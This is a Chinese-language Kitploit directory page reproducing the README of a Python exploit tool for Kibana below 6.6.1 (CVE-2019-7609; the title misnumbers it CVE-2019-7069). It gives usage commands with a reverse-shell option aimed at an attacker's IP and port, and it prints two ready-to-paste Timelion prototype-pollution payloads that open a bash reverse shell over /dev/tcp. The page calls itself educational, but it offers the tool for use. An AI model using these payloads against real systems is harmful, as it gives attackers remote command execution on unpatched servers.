Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-7069-POC — 针对 Kibana CVE-2019-7609 的 Python 利用工具,通过原型污染实现远程代码执行。自动检测易受攻击的版本,验证漏洞,并可选地启动反向 Shell。 | Kitploit
工具/GitHubGitHub/caelumisme/cve-2019-7069-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发
GitHubcaelumisme/cve-2019-7069-poc

CVE-2019-7069-POC

针对 Kibana CVE-2019-7609 的 Python 利用工具,通过原型污染实现远程代码执行。自动检测易受攻击的版本,验证漏洞,并可选地启动反向 Shell。

查看仓库
9个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Kibana < 6.6.1 远程代码执行漏洞利用 (CVE-2019-7609)

Exploit Banner

🚨 教育性 RCE 利用脚本 🚨

作者: LandGrey (Python3 重构由 [Your Name])
参考: Exploit-DB 46651
CVE: CVE-2019-7609


⚠️ 免责声明:
本脚本仅用于教育和授权的渗透测试。请勿在您不拥有或未经明确授权的系统上使用。作者和贡献者不对该工具的任何误用或损害负责。


🎯 这是什么?

这是一个 Python 3 漏洞利用脚本,针对 Kibana < 6.6.1 版本中的远程代码执行漏洞。它利用原型污染漏洞在易受攻击的 Kibana 实例上执行任意命令,包括生成反向 shell。

🕹️ 功能特点

  • 自动检测 Kibana 版本
  • 验证漏洞状态
  • 可选触发反向 shell 到您的监听器
  • 清晰、交互式的终端输出
  • 完全兼容 Python 3

📚 参考资料

  • Exploit-DB 条目 46651
  • Kibana 官方网站
  • CVE-2019-7609

🚀 使用方法

root@kitploit:~
python3 kibana_exploit.py -u http://target-kibana:5601

触发反向 shell:

root@kitploit:~
python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT

示例

root@kitploit:~
python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444

🛠️ 依赖要求

  • Python 3.x
  • requests 库
  • packaging 库

使用以下命令安装依赖:

root@kitploit:~
pip install requests packaging

💡 通过 Timelion 手动利用

您也可以使用 Kibana 的 Timelion 可视化工具手动利用此漏洞:

  1. 打开 Kibana
  2. 将以下其中一个载荷粘贴到 Timelion 可视化工具中
  3. 点击运行
  4. 在左侧面板中,点击 Canvas
  5. 您的反向 shell 应该会弹出!:)

载荷作者:securityMB:

root@kitploit:~
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

载荷作者:chybeta:

root@kitploit:~
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

将 192.168.1.100 和 4444 替换为您自己的监听器 IP 和端口。


🧩 工作原理

  • 通过 HTTP 请求检测 Kibana 版本
  • 验证目标是否受 CVE-2019-7609 影响
  • 利用原型污染执行任意命令
  • 可选生成反向 shell 到指定的主机和端口

🎨 输出

该脚本提供清晰、步骤式的输出,用于检测、验证和利用,便于跟随且使用起来很有趣!


👾 娱乐与学习

本脚本是学习原型污染、远程代码执行和渗透测试技术的绝佳方式。请负责任地使用它,并且始终获得授权!


📝 许可

本项目仅用于教育目的。不提供任何保证或担保。合乎道德地黑客,保持好奇心,享受乐趣!

下载工具